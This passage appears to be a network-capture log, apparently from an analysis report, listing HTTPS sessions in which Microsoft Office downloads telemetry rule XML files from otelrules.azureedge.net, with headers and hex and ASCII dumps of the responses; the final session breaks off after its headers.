                                                                                                                                      2024-10-07 01:23:18 UTC192OUTGET /rules/rule702501v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:18 UTC563INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:18 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1415
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:57 GMT
                                                                                                                                      ETag: "0x8DC582BE7C66E85"
                                                                                                                                      x-ms-request-id: cad35e9e-b01e-0021-3602-17cab7000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012318Z-1657d5bbd4824mj9d6vp65b6n400000002yg00000000gpsq
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:18 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      129192.168.2.44988013.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:18 UTC192OUTGET /rules/rule700500v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:18 UTC563INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:18 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1368
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                      ETag: "0x8DC582BE51CE7B3"
                                                                                                                                      x-ms-request-id: 3e7839e3-701e-0053-5cff-163a0a000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012318Z-1657d5bbd4824mj9d6vp65b6n400000002y000000000megq
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:18 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 6f 77 65 72 50 6f 69 6e 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPowerPoint" S="Medium" /> <F T=


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      130192.168.2.44988213.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:18 UTC192OUTGET /rules/rule702551v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:18 UTC563INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:18 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1415
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                                      ETag: "0x8DC582BDCE9703A"
                                                                                                                                      x-ms-request-id: c7b470af-b01e-005c-24fe-164c66000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012318Z-1657d5bbd48gqrfwecymhhbfm800000001p000000000897z
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:18 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702551" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      131192.168.2.44988413.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:18 UTC192OUTGET /rules/rule701351v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:18 UTC563INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:18 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1407
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                      ETag: "0x8DC582BE687B46A"
                                                                                                                                      x-ms-request-id: 20e89b60-501e-008c-3a03-17cd39000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012318Z-1657d5bbd48tnj6wmberkg2xy800000002tg00000000paf8
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:18 UTC1407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      132192.168.2.44988313.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:18 UTC192OUTGET /rules/rule702550v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:18 UTC563INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:18 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1378
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                      ETag: "0x8DC582BE584C214"
                                                                                                                                      x-ms-request-id: dfa7567c-f01e-003f-67de-16d19d000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012318Z-1657d5bbd48dfrdj7px744zp8s00000002k000000000a5uy
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:18 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702550" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPersonalization" S="Medium" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      133192.168.2.44988513.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:18 UTC192OUTGET /rules/rule701350v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:18 UTC563INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:18 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1370
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                      ETag: "0x8DC582BDE62E0AB"
                                                                                                                                      x-ms-request-id: 838d7376-001e-0014-17fe-165151000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012318Z-1657d5bbd48xdq5dkwwugdpzr0000000032g00000000g79r
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:18 UTC1370INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPerformance" S="Medium" /> <F


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      134192.168.2.44988713.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:19 UTC192OUTGET /rules/rule702151v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:19 UTC563INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:19 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1397
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                      ETag: "0x8DC582BE156D2EE"
                                                                                                                                      x-ms-request-id: 7d18055e-701e-0098-56ff-16395f000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012319Z-1657d5bbd48xlwdx82gahegw4000000002zg00000000dcqn
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:19 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeo


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      135192.168.2.44989113.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:19 UTC192OUTGET /rules/rule703000v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:19 UTC563INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:19 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1369
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                                                      ETag: "0x8DC582BE32FE1A2"
                                                                                                                                      x-ms-request-id: c55b1dc3-701e-0097-42e9-16b8c1000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012319Z-1657d5bbd48xsz2nuzq4vfrzg800000002r0000000004tc2
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:19 UTC1369INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 75 74 6c 6f 6f 6b 4d 61 63 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703000" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookMac" S="Medium" /> <F T


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      136192.168.2.44989013.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:19 UTC192OUTGET /rules/rule700751v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:19 UTC563INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:19 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1414
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                      ETag: "0x8DC582BE03B051D"
                                                                                                                                      x-ms-request-id: 4543d13f-701e-0050-5a04-176767000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012319Z-1657d5bbd48gqrfwecymhhbfm800000001r0000000000tqk
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:19 UTC1414INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      137192.168.2.44988813.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:19 UTC192OUTGET /rules/rule702150v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:19 UTC563INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:19 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1360
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:28:07 GMT
                                                                                                                                      ETag: "0x8DC582BEDC8193E"
                                                                                                                                      x-ms-request-id: b1fbfe33-a01e-003d-4fd4-1698d7000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012319Z-1657d5bbd48xsz2nuzq4vfrzg800000002gg00000000xxwq
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
